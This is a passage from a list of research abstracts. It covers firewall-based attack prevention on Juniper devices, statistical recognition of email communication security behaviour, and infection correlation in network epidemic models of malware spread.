    In the world of computer and network security, there are myriad ways to launch an attack, which, from the perspective of a network, can usually be defined as "traffic that has huge malicious intent." A firewall acts as one of the measures to secure the device from incoming unauthorized data. There are an infinite number of computer attacks that no firewall can prevent, such as those executed locally on the machine by a malicious user. From the network's perspective, there are numerous types of attack. All the attacks that degrade the effectiveness of data can be grouped into two types: brute force and precision. The Juniper firewall has the capability to protect against both types of attack. Denial of Service (DoS) attacks are one of the most well-known network security threats among brute force attacks, which is largely due to the high-profile way in which they can affect networks. Over the years, some of the largest, most respected Internet sites have been effectively taken offline by Denial of Service (DoS) attacks. A DoS attack typically has a singular focus, namely, to cause the services running on a particular host or network to become unavailable. Some DoS attacks exploit vulnerabilities in an operating system and cause it to crash, such as the infamous WinNuke attack. Others submerge a network or device with traffic so that there are no more resources to handle legitimate traffic. Precision attacks typically involve multiple phases and often involve a bit more thought than brute force attacks, all the way from reconnaissance to machine ownership. Before a precision attack is launched, information about the victim needs to be gathered. This information gathering typically takes the form of various types of scans to determine available hosts, networks, and ports. The hosts available on a network can be determined by ping sweeps. The available ports on a machine can be located by port scans. Screens cover a wide variety of attack traffic as they are configured on a per-zone basis. Depending on the type of screen being configured, there may be additional settings beyond simply blocking the traffic. Attack prevention is also a native function of any firewall. The Juniper firewall handles traffic on a per-flow basis. We can use flows or sessions as a way to determine whether traffic attempting to traverse the firewall is legitimate. We control the state-checking components resident in the Juniper firewall by configuring "flow" settings. These settings allow you to configure state checking for various conditions on the device. You can use flow settings to protect against TCP hijacking, and to generally ensure that the firewall is performing full state processing when desired. We take a case study of an attack on a network and study the detection of the malicious packets on a NetScreen firewall. A new solution for securing enterprise networks will be developed here.

  19. Statistics-based email communication security behavior recognition

    NASA Astrophysics Data System (ADS)

    Yi, Junkai; Su, Yueyang; Zhao, Xianghui

    2017-08-01

    With the development of information technology, e-mail has become a popular communication medium. It is of great significance to determine the relationship between the two sides of a communication. Firstly, this paper analysed and processed the content and attachments of e-mail using steganalysis and malware analysis techniques. It then extracts features and establishes a behaviour model based on Naive Bayesian theory. Then a behaviour analysis method was employed to calculate and evaluate the communication security. Finally, some experiments on the accuracy of identifying the behavioural relationship of a communication were carried out. The results show that this method is effective, with a correctness of eighty-four percent.

  20. Nodal infection in Markovian susceptible-infected-susceptible and susceptible-infected-removed epidemics on networks are non-negatively correlated

    NASA Astrophysics Data System (ADS)

    Cator, E.; Van Mieghem, P.

    2014-05-01

    By invoking the famous Fortuin, Kasteleyn, and Ginibre (FKG) inequality, we prove the conjecture that the correlation of infection at the same time between any pair of nodes in a network cannot be negative for (exact) Markovian susceptible-infected-susceptible (SIS) and susceptible-infected-removed (SIR) epidemics on networks. The truth of the conjecture establishes that the N-intertwined mean-field approximation (NIMFA) upper bounds the infection probability in any graph, so that network design based on NIMFA always leads to safe protections against malware spread. However, when the infection and/or curing are not Poisson processes, the infection correlation between two nodes can be negative.
